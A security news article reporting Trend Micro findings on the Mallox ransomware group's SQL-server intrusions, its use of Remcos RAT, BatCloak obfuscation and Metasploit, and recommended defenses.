The Mallox ransomware group has increased its targeted attacks against organizations with vulnerable SQL servers. Recently, the group surfaced with a new variant and additional malware tools to increase its persistence and avoid detection while gaining momentum.

Malloz, also known as TargetCompany, Fargo, and Tohnichi, emerged in June 2021. In its latest attacks, the group combined its custom ransomware with two proven malware products, the Remcos RAT and the BatCloak obfuscator, as revealed by researchers from TrendMicro in a recent blog post.

Despite the new tools, the group’s method of gaining entry into targeted networks remains consistent. They exploit vulnerable SQL servers to persistently deploy their first stage. The group commonly exploits two remote code execution vulnerabilities, CVE-2020-0618 and CVE-2019-1068, in their attacks.

However, the researchers discovered that the group has started changing its tactics in later stages of the attack to maintain a stealthy presence on targeted networks and conceal its malicious activity. The group tries various directions to achieve persistence, such as changing URLs or applicable paths, until it successfully executes the Remcos RAT.

The team at TrendMicro identified the campaign while investigating suspicious network connections related to PowerShell. This led to the discovery of a new variant of Mallox, which they referred to as TargetCompany. The payload binary of this variant belongs to the second version of the ransomware family, characterized by a connection to a command-and-control server with a ‘/ap.php’ landing page.

However, the initial attempt at access was terminated and blocked by existing security solutions. In response, the attackers used a fully undetectable FUD-wrapped version of their binaries to continue the attack. FUD is an obfuscation technique that scrambles ransomware to evade signature-based detection technology. Mallox appears to be using a FUD style employed by BatCloak, utilizing a batch file as an outer layer and then decoding and loading using PowerShell for execution.

The group also utilized the hacking tool Metasploit in a later stage of the attack before the Remcos RAT concludes its final routine. This allowed them to load the Mallox ransomware wrapped in the FUD packer. While the use of FUD packers and Metasploit is not new, it demonstrates the group’s determination to innovate and evade existing security solutions.

Security teams and organizations should not underestimate the effectiveness of these tactics in circumventing current security solutions. The researchers emphasize the importance of visibility into patching gaps and checking all possible attack surfaces to prevent exploitation.

Given that the FUD packer used by Mallox appears to outsmart current security solutions, researchers recommend incorporating AI- and machine learning-based file checking and behavior monitoring solutions. Additionally, implementing best practices for network blocking, specific ransomware detection, and blocking measures can provide a multi-layered approach to mitigating the impact of threats like Mallox.

Organizations should also prioritize user awareness and implement redundant exercises to prevent intrusion attempts and the execution of malicious activities.

Overall, Mallox continues to evolve and pose a significant threat to organizations with vulnerable SQL servers. It is crucial for security teams and organizations to stay vigilant, adapt their defense strategies, and prioritize proactive measures to defend against this persistent ransomware group.

Source link